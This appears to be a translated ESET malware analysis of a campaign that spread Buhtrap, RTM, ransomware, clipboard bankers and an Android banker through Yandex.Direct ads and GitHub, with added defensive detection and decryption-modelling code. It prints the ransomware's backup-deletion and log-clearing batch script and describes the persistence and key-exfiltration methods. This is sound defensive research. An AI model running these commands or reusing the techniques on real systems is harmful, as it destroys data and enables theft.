Using Yandex.Direct to distribute the Buhtrap backdoor and encryptor

To target accountants in a cyberattack, you can use the working documents they search for online. That is exactly what one cybercrime group has been doing over the past few months, distributing the well-known Buhtrap and RTM backdoors along with encryptors and software for stealing cryptocurrency. Most of the targets are in Russia. The attack was carried out by placing malicious advertisements on Yandex.Direct. Potential victims were directed to a website where they were asked to download a malicious file disguised as a document template. Yandex removed the malicious ads after our warning.

The Buhtrap source code was leaked online some time ago, so anyone can use it. We have no information about the availability of the RTM code.

In this post, we describe how the attackers distributed malware using Yandex.Direct and hosted it on GitHub. The post concludes with a technical analysis of the malware.

[Screenshot: the blanki-shabloni24[.]ru download site]

Buhtrap and RTM are back in business

Distribution mechanism and victims

The various payloads delivered to victims share a common distribution mechanism. All malicious files created by the attackers were hosted in two different GitHub repositories.

Typically, a repository contained a single downloadable malicious file, which was changed frequently. Since GitHub lets you view a repository's change history, we can see which malware was distributed during a given period. To convince the victim to download the malicious file, the attackers used the website blanki-shabloni24[.]ru, shown in the screenshot above.

The design of the site and all the malicious file names follow a single theme: forms, templates, contracts, samples, etc. Given that the Buhtrap and RTM software had already been used in attacks on accountants in the past, we assumed the strategy of the new campaign was the same. The only question was how the victim got to the attackers' website.

Infection

At least several of the potential victims who landed on this site were drawn there by malicious advertising. Below is an example URL:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

As you can see from the link, the banner was placed on the legitimate accounting forum bb.f2[.]kz. It is important to note that banners appeared on various sites, all had the same campaign id (blanki_rsya), and most of the sites were related to accounting or legal assistance services. The URL shows that the potential victim used the search query "download invoice form", which supports our hypothesis of targeted attacks. Below are the sites where the banners appeared and the corresponding search queries.

  • download invoice form - bb.f2[.]kz
  • contract sample - Ipopen[.]ru
  • complaint application sample - 77metrov[.]ru
  • contract form - blank-dogovor-kupli-prodazhi[.]ru
  • court petition sample - zen.yandex[.]ru
  • complaint sample - yurday[.]ru
  • contract sample form - Regforum[.]ru
  • contract form - assistentus[.]ru
  • apartment contract sample - napravah[.]com
  • sample legal contract - avito[.]ru

The blanki-shabloni24[.]ru site may have been set up to pass a simple visual inspection. Typically, an ad pointing to a professional-looking site with a link to GitHub does not look like something obviously malicious. In addition, the attackers uploaded the malicious files to the repository only for short periods, probably for the duration of an ad campaign. Most of the time, the GitHub repository contained an empty zip archive or an empty EXE file. Thus, the attackers could distribute ads via Yandex.Direct on sites that accountants were likely to visit in response to specific search queries.

Next, let's look at the various payloads distributed this way.

Payload analysis

Distribution timeline

The malicious campaign started at the end of October 2018 and was still active at the time of writing. Since the whole repository was publicly available on GitHub, we compiled an exact timeline of the distribution of six different malware families (see the figure below). We added a line showing when the banner link was detected, as measured by ESET telemetry, for comparison with the git history. As you can see, it correlates well with the availability of the payload on GitHub. The discrepancy at the end of February is explained by the fact that we are missing part of the change history, because the repository was removed from GitHub before we could obtain it in full.

Figure 1. Timeline of malware distribution.

Code-signing certificates

The campaign used several certificates. Some were used to sign more than one malware family, which further indicates that the different samples belong to the same campaign. Despite possessing the private key, the operators did not sign the binaries systematically and did not use the key for all samples. At the end of February 2019, the attackers started producing invalid signatures using a Google-owned certificate for which they did not have the private key.

All the certificates involved in the campaign, and the malware families they signed, are listed in the table below.

[Table image: code-signing certificates and the malware families they signed]

We used these code-signing certificates to establish links with other malware families. For most of the certificates, we found no samples that were not distributed via the GitHub repository. However, the TOV "MARIYA" certificate was also used to sign malware belonging to the Wauchos botnet, adware and miners. It is unlikely that this malware is related to the campaign; most likely the certificate was bought on the darknet.

Win32/Filecoder.Buhtrap

The first component that caught our attention was the newly discovered Win32/Filecoder.Buhtrap. It is a Delphi binary that is sometimes packed. It was distributed mainly in February and March 2019. It behaves as expected of ransomware: it scans local drives and network shares and encrypts the files it finds. It does not need an Internet connection, since it does not contact a server to send the private key. Instead, it appends a "token" to the end of the ransom note and suggests contacting the operators by email or Bitmessage.

To encrypt as many sensitive resources as possible, Filecoder.Buhtrap runs a thread designed to shut down key software that may hold open handles to files containing valuable information, which could otherwise prevent their encryption. The targeted processes are mainly database management systems (DBMS). In addition, Filecoder.Buhtrap deletes log files and backups to make data recovery harder. To do this, it runs the batch script below.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib "%userprofile%\documents\Default.rdp" -s -h
del "%userprofile%\documents\Default.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
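As an added illustration (not from the original post), here is how a defender can turn that script into detection logic: a small Python scanner over process-creation events that flags the shadow-copy and backup deletion, recovery disabling, event-log clearing and event-log service disabling seen above, and raises a higher-confidence alert when several distinct rules fire together on one host. The event line format and the sample events are constructed for this example.

```python
import re

# Constructed Sysmon/EDR-style process-creation events written for this example;
# they are not telemetry from the campaign.
SAMPLE_EVENTS = [
    "pid=4120 image=C:\\Windows\\System32\\cmd.exe cmd=cmd.exe /c vssadmin delete shadows /all /quiet",
    "pid=4121 image=C:\\Windows\\System32\\wbem\\WMIC.exe cmd=wmic shadowcopy delete",
    "pid=4122 image=C:\\Windows\\System32\\bcdedit.exe cmd=bcdedit /set {default} recoveryenabled no",
    "pid=4123 image=C:\\Windows\\System32\\wevtutil.exe cmd=wevtutil.exe clear-log Security",
    "pid=4124 image=C:\\Windows\\System32\\sc.exe cmd=sc config eventlog start=disabled",
    "pid=4125 image=C:\\Windows\\System32\\wbadmin.exe cmd=wbadmin delete catalog -quiet",
    "pid=4126 image=C:\\Windows\\System32\\vssadmin.exe cmd=vssadmin list shadows",
    "pid=4127 image=C:\\Windows\\System32\\reg.exe cmd=reg query HKCU\\Software\\Microsoft\\Windows",
]

# (rule name, pattern over the command line, MITRE ATT&CK technique)
RULES = [
    ("shadow_copy_deletion", re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b|\bwmic(\.exe)?\s+shadowcopy\s+delete\b", re.I), "T1490"),
    ("backup_catalog_deletion", re.compile(r"\bwbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup|backup)\b", re.I), "T1490"),
    ("boot_recovery_disabled", re.compile(r"\bbcdedit(\.exe)?\s+/set\s.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I), "T1490"),
    ("event_log_cleared", re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\s+(application|security|system)\b", re.I), "T1070.001"),
    ("event_log_service_disabled", re.compile(r"\bsc(\.exe)?\s+config\s+eventlog\s+start\s*=\s*disabled\b", re.I), "T1562.002"),
]

EVENT_RE = re.compile(r"pid=(\d+)\s+image=(\S+)\s+cmd=(.*)$")

def parse_event(line):
    """Split one constructed event line into its fields; None if it does not parse."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    return {"pid": int(m.group(1)), "image": m.group(2), "cmd": m.group(3)}

def match_rules(cmd):
    """Return the (rule, technique) pairs whose pattern matches the command line."""
    return [(name, technique) for name, pat, technique in RULES if pat.search(cmd)]

def scan(lines):
    """Evaluate every rule against every event; one hit per matching rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for name, technique in match_rules(ev["cmd"]):
            hits.append({"pid": ev["pid"], "rule": name, "technique": technique, "cmd": ev["cmd"]})
    return hits

def recovery_inhibition_cluster(hits, min_rules=3):
    """Several distinct rules firing on one host in a short window is the high-confidence
    signal; a lone vssadmin call may well be an administrator."""
    return len({h["rule"] for h in hits}) >= min_rules

if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"[{h['technique']}] {h['rule']}: pid {h['pid']} -> {h['cmd']}")
    print("recovery-inhibition cluster:", recovery_inhibition_cluster(scan(SAMPLE_EVENTS)))
```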

Filecoder.Buhtrap uses the legitimate IP Logger web service, which is designed to collect information about website visitors. Here it is used to track the ransomware's victims, via the following command line:

mshta.exe "javascript:document.write('');"

Files are selected for encryption if they do not match three exclusion lists. First, files with the following extensions are not encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat. Second, all files whose full path contains one of the directory strings from the list below are excluded.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
google\chrome
google
boot
application data
apple computer\safari
appdata
all users
:\windows
:\system volume information
:\nvidia
:\intel

Third, certain file names are excluded from encryption, among them the file name of the ransom note. The list is given below. Clearly, all these exclusions are meant to keep the machine bootable, but with minimal usability.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

File encryption scheme

Once executed, the malware generates a 512-bit RSA key pair. The private exponent (d) and modulus (n) are then encrypted with a hard-coded 2048-bit public key (public exponent and modulus), zlib-compressed and base64-encoded. The code for this is shown in Figure 2.

Figure 2. Hex-Rays decompilation of the 512-bit RSA key pair generation routine.

Below is an example of the plaintext containing the generated private key, which is the token appended to the ransom note.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

The attackers' hard-coded 2048-bit public key (exponent e and modulus n) was also recovered from the sample.


Files are encrypted using AES-128-CBC with a 256-bit key. A new key and a new initialization vector are generated for each encrypted file. The key information is appended to the end of the encrypted file. Let's look at the format of an encrypted file.
Encrypted files have the following header:

[Figure: layout of the encrypted file header]

The source file's data, with the magic value VEGA appended, is encrypted only up to the first 0x5000 bytes. All information needed for decryption is appended to the file in the following structure:

[Figure: layout of the decryption information appended to the file]

- The file-size marker contains a flag indicating whether the file is larger than 0x5000 bytes.
- AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key pair))
- RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hard-coded RSA public key))
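To make that key hierarchy concrete, here is an added Python model of the scheme (illustrative code written for this post, not the malware's code): a per-victim 512-bit RSA key, a per-file AES key and IV wrapped with it, and the victim's private key wrapped with the hard-coded 2048-bit public key, zlib-compressed and base64-encoded into the token. It assumes the d || n plaintext is laid out as two 64-byte fields (consistent with the 256 hex digits of the token example above), uses unpadded textbook RSA in place of whatever padding the real sample applies, and models only the key material, not the AES file encryption; recover shows that nothing can be unwrapped without the attackers' private key.

```python
import base64, os, random, zlib, math
_rng = random.SystemRandom()
VB = 64  # bytes in the per-victim 512-bit RSA modulus (and the exponent field)

def is_probable_prime(n, rounds=16):  # Miller-Rabin, enough for a demo
    if n < 4 or n % 2 == 0:
        return n in (2, 3)
    r = ((n - 1) & -(n - 1)).bit_length() - 1  # n - 1 = d * 2**r, d odd
    d = (n - 1) >> r
    for _ in range(rounds):
        x = pow(_rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def rsa_keygen(bits, e=65537):  # textbook RSA; returns ((e, n), (d, n))
    def prime(b):
        while True:
            c = _rng.getrandbits(b) | (1 << (b - 1)) | 1  # top bit set, odd
            if is_probable_prime(c):
                return c
    while True:
        p, q = prime(bits // 2), prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return (e, p * q), (pow(e, -1, phi), p * q)

def rsa_apply(data, key):  # unpadded RSA on one block (a simplification)
    exp, n = key
    m = int.from_bytes(data, "big")
    if m >= n:
        raise ValueError("block must be smaller than the modulus")
    return pow(m, exp, n).to_bytes((n.bit_length() + 7) // 8, "big")

def make_rsa_key_blob(victim_priv, attacker_pub):  # zlib(RSA_attacker(d || n))
    d, n = victim_priv
    return zlib.compress(rsa_apply(d.to_bytes(VB, "big") + n.to_bytes(VB, "big"), attacker_pub))

def make_aes_key_blob(aes_key, iv, victim_pub):  # zlib(RSA_victim(AES key || IV))
    return zlib.compress(rsa_apply(aes_key + iv, victim_pub))

def recover(rsa_key_blob, aes_key_blob, attacker_priv):  # needs the attackers' private key
    plain = rsa_apply(zlib.decompress(rsa_key_blob), attacker_priv)[-2 * VB:]
    victim_priv = (int.from_bytes(plain[:VB], "big"), int.from_bytes(plain[VB:], "big"))
    key_iv = rsa_apply(zlib.decompress(aes_key_blob), victim_priv)[-48:]
    return key_iv[:32], key_iv[32:]

def demo(attacker_bits=2048):  # whole chain for one file; 2048 is the size in the sample
    attacker_pub, attacker_priv = rsa_keygen(attacker_bits)  # hard-coded in the binary
    victim_pub, victim_priv = rsa_keygen(512)                # generated on the victim
    aes_key, iv = os.urandom(32), os.urandom(16)             # fresh for every file
    token = base64.b64encode(make_rsa_key_blob(victim_priv, attacker_pub))  # in the ransom note
    aes_blob = make_aes_key_blob(aes_key, iv, victim_pub)    # appended to the encrypted file
    return recover(base64.b64decode(token), aes_blob, attacker_priv) == (aes_key, iv)
```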

Win32/ClipBanker

Win32/ClipBanker is a component that was distributed for a short period, from late October to early December 2018. Its job is to monitor the clipboard contents, looking for cryptocurrency wallet addresses. Having identified a target wallet address, ClipBanker replaces it with an address believed to belong to the operators. The samples we examined were neither packed nor obfuscated. The only mechanism used to mask behaviour is string encryption: the operators' wallet addresses are encrypted with RC4. The targeted cryptocurrencies are Bitcoin, Bitcoin Cash, Dogecoin, Ethereum and Ripple.

During the period the malware was spreading, only a small amount in BTC was sent to the attackers' Bitcoin wallets, which casts doubt on the success of the campaign. Moreover, there is no evidence that these transactions were related to ClipBanker at all.

Win32/RTM

The Win32/RTM component was distributed for several days in early March 2019. RTM is a banking Trojan written in Delphi, aimed at remote banking systems. In 2017, ESET researchers published a detailed analysis of this program, and that description is still relevant. In January 2019, Palo Alto Networks also published a blog post about RTM.

Buhtrap Loader

For some time, a loader was available on GitHub that did not resemble earlier Buhtrap tools. It contacts https://94.100.18[.]67/RSS.php?<some_id> to obtain the next stage and loads it directly into memory. We can distinguish two variants of the second-stage code. In the first, RSS.php returned the Buhtrap backdoor directly; this backdoor is very similar to the one available after the source code leak.

Interestingly, we see several campaigns using the Buhtrap backdoor, allegedly run by different operators. In this case, the main difference is that the backdoor is loaded directly into memory and does not use the usual scheme with the DLL deployment process that we described earlier. In addition, the operators changed the RC4 key used to encrypt network traffic to the C&C server. In most of the campaigns we have seen, the operators did not bother to change this key.

In the second, more complex variant, the RSS.php URL handed over a different loader. It implemented some obfuscation, such as rebuilding the import table dynamically. The purpose of this loader is to contact the C&C server msiofficeupd[.]com/api/F27F84EDA4D13B15/2, send logs and wait for a response. It treats the response as a blob, loads it into memory and executes it. The payload we observed being run by this loader was the same Buhtrap backdoor, but there may have been other components.

Android/Spy.Banker

Interestingly, a component for Android was also found in the GitHub repository. It was in the master branch for only one day, 1 November 2018. Apart from its presence on GitHub, ESET telemetry found no evidence of this malware being distributed.

The component is packaged as an Android application package (APK). It is heavily obfuscated. The malicious behaviour is hidden in an encrypted JAR located inside the APK. It is encrypted with RC4 using the following key:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

The same key and algorithm are used to encrypt strings. The JAR is located at APK_ROOT + image/files. The first 4 bytes of the file contain the length of the encrypted JAR, which starts immediately after the length field.
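For an analyst extracting that JAR, here is an added Python example (not the malware's code and not from the original post) that implements RC4 with the key above and parses the length-prefixed container. The post does not state the byte order of the 4-byte length, so big-endian is assumed and can be overridden; the sample container is constructed inside the block.

```python
import io, struct, zipfile

# RC4 key recovered from the APK, as listed in the post.
RC4_KEY = bytes([
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96,
])

def rc4(key, data):
    """Plain RC4 (KSA then PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xff
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xff
        j = (j + s[i]) & 0xff
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xff])
    return bytes(out)

def extract_jar(container, key=RC4_KEY, length_fmt=">I"):
    """Parse the image/files blob: 4-byte length, then the RC4-encrypted JAR.
    The post does not say whether the length is big- or little-endian; big-endian
    (Java's DataOutputStream default) is assumed, pass length_fmt="<I" otherwise."""
    if len(container) < 4:
        raise ValueError("container too short for a length field")
    (length,) = struct.unpack(length_fmt, container[:4])
    if length > len(container) - 4:
        raise ValueError(f"declared length {length} exceeds {len(container) - 4} available bytes")
    jar = rc4(key, container[4:4 + length])
    if jar[:4] != b"PK\x03\x04":  # local file header magic of a ZIP/JAR
        raise ValueError("decrypted payload is not a ZIP/JAR (wrong key or byte order?)")
    return jar

def build_container(jar, key=RC4_KEY, length_fmt=">I"):
    """Inverse of extract_jar; used here only to construct a test sample."""
    return struct.pack(length_fmt, len(jar)) + rc4(key, jar)

def sample_jar():
    """Constructed stand-in for the real JAR: a minimal zip with a manifest."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    return buf.getvalue()

if __name__ == "__main__":
    blob = build_container(sample_jar())
    jar = extract_jar(blob)
    print(f"recovered {len(jar)}-byte JAR, entries:", zipfile.ZipFile(io.BytesIO(jar)).namelist())
```

Since the post says the strings are encrypted with the same key and algorithm, the same rc4 call applies to them as well.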

After decrypting the file, we found that it was Anubis, a previously documented banker for Android. The malware has the following capabilities:

  • Microphone recording
  • Taking screenshots
  • Obtaining GPS coordinates
  • Keylogger
  • Encrypting device data and demanding a ransom
  • Sending spam

Interestingly, the banker uses Twitter as a backup communication channel to obtain another C&C server. The sample we analysed used the @JonesTrader account, but at the time of analysis it had already been blocked.

The banker contains a list of targeted applications on the Android device. It is longer than the list obtained in the Sophos study. The list includes many banking apps, online shopping programs such as Amazon and eBay, and cryptocurrency services.

MSIL/ClipBanker.IH

The last component distributed as part of this campaign is a .NET Windows executable that appeared in March 2019. Most of the versions studied were packed with ConfuserEx v1.0.0. Like ClipBanker, this component uses the clipboard. Its targets are a wide range of cryptocurrencies, as well as trade offers on Steam. In addition, it uses the IP Logger service to steal Bitcoin private WIF keys.

Protection mechanisms
In addition to the advantages ConfuserEx provides against debugging, dumping and tampering, the component includes the ability to detect antivirus products and virtual machines.

To detect whether it is running in a virtual machine, the malware uses the built-in Windows WMI command line (WMIC) to query BIOS information, namely:

wmic bios

The program then parses the command output and looks for the keywords VBOX, VirtualBox, XEN, qemu, bochs and VM.

To detect antivirus products, the malware sends a Windows Management Instrumentation (WMI) query to the Windows Security Center using the ManagementObjectSearcher API, as shown below. Once decoded from base64, the call looks like this:

ManagementObjectSearcher('root\SecurityCenter2', 'SELECT * FROM AntivirusProduct')

Figure 3. Procedure for detecting antivirus products.

In addition, the malware checks whether CryptoClipWatcher, a tool that protects against clipboard attacks, is running and, if so, suspends all threads in that process, thereby disabling the protection.

Persistence

The malware we studied copies itself to %APPDATA%\google\updater.exe and sets the "hidden" attribute on the google directory. It then modifies the Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell value in the Windows registry, appending the path to updater.exe. This way, the malware is executed every time the user logs in.

Malicious behaviour

Like ClipBanker, the malware monitors the clipboard contents and looks for cryptocurrency wallet addresses; when it finds one, it replaces it with one of the operator's addresses. Below is the list of targeted address types, based on what was found in the code.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

For each address type there is a corresponding regular expression. The STEAM_URL value is used to attack the Steam system, as can be seen from the regular expression used to match it in the clipboard:

\b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+\b

Exfiltration channel

In addition to replacing addresses in the clipboard, the malware targets the WIF private keys of Bitcoin, Bitcoin Core and Electrum Bitcoin wallets. The program uses iplogger.org as the exfiltration channel for the stolen WIF private keys. To do this, the operators place the private-key data in the User-Agent HTTP header, as shown below.

Figure 4. IP Logger console with exfiltrated data.

The operators did not use iplogger.org to exfiltrate wallets. They probably resorted to a different method because of the 255-character limit on the User-Agent field shown in the IP Logger web interface. In the samples we studied, the other output server was stored in the DiscordWebHook environment variable. Surprisingly, this environment variable is not assigned anywhere in the code. This suggests that the malware is still in development and that the variable is set on the operator's test machine.

There is another sign that the program is under development. The binary includes two iplogger.org URLs, and both are queried when data is exfiltrated. When one of these URLs is requested, the value in the Referer field is prefixed with "DEV /". We also found a version that was not packed with ConfuserEx, in which the field holding this URL is named DevFeedbackUrl. Based on the environment variable name, we believe the operators plan to use the legitimate Discord service and its webhook system to steal cryptocurrency wallets.

Conclusion

This campaign is an example of the use of legitimate advertising services in cyberattacks. The scheme targets Russian organizations, but we would not be surprised to see a similar attack using non-Russian services. To avoid compromise, users must be confident in the reputation of the source of the software they download.

A full list of indicators of compromise and MITRE ATT&CK attributes is available at the link.

Source: www.habr.com
